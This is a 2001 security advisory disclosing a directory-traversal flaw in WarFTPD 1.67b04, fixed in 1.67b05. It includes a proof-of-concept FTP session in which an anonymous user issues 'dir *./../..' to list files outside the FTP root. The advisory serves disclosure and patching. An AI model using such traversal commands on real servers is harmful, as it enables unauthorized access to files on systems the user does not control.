War FTPD Win32 1.67b04 Allows Directory Traversal

Reported March 6, 2001, by [email protected].

VERSION AFFECTED

  • Gjaa’s Internet WarFTPD Win32 1.67b04

DESCRIPTION

A vulnerability exists that lets an attacker break out of FTP root by using relative paths. For example, by connecting to a vulnerable host and issuing the command “dir *./../..”, an attacker can list the contents of the directory one level up from the root directory.

DEMONSTRATION

[email protected] provided the following proof-of-concept scenario:

 

Verbindung mit 10.17.3.44 wurde hergestellt.

220- Jgaa's Fan Club FTP Service WAR-FTPD 1.67-04 Ready

220 Please enter your user name.

Benutzer (10.17.3.44:(none)): anonymous

331 User name okay. Give your full Email address as password.

Kennwort:

230 User logged in, proceed.

ftp> dir

200 Port command okay.

150 Opening ASCII NO-PRINT mode data connection

for ls -l.

total 123

drwxrwxrwx 1 ftp ftp 0 Mar 2 12:17 test

-rwxrwxrwx 1 ftp ftp 6 Mar 2 12:33 movedtohomedir.txt

-rwxrwxrwx 1 ftp ftp 11 Mar 2 00:29 bisontest.txt

drwxrwxrwx 1 ftp ftp 0 Mar 3 15:59 HTTP

drwxrwxrwx 1 ftp ftp 0 Mar 3 17:05 huhu

drwxrwxrwx 1 ftp ftp 0 Mar 5 13:42 te

drwxrwxrwx 1 ftp ftp 0 Mar 5 13:42 ..te

226 Transfer finished successfully. Data connection

closed.

FTP: 452 Bytes empfangen in 0,02Sekunden

22,60KB/s

ftp> cd ..

550 Permission denied.

ftp> dir *./../..

200 Port command okay.

150 Opening ASCII NO-PRINT mode data connection

for ls *./../...

total 123

-rwxrwxrwx 1 ftp ftp 251658240 Mar 4 18:42

WIN386.SWP

drwxrwxrwx 1 ftp ftp 0 Jan 6 20:32 games

drwxrwxrwx 1 ftp ftp 0 Jan 7 19:58 HalfLife

226 Transfer finished successfully. Data connection

closed.

FTP: 2977 Bytes empfangen in 0,07Sekunden

42,53KB/s

VENDOR RESPONSE

The vendor, Jgaa’s Internet, has released version 1.67b05 that corrects this issue. It is available at http://support.jgaa.com/index.php?cmd=DownloadVersion&ID=32.

CREDIT
Discovered by [email protected].

 

TAGS: Security
Hide comments

Comments

  • Allowed HTML tags: <em> <strong> <blockquote> <br> <p>

Plain text

  • No HTML tags allowed.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Lines and paragraphs break automatically.
Publish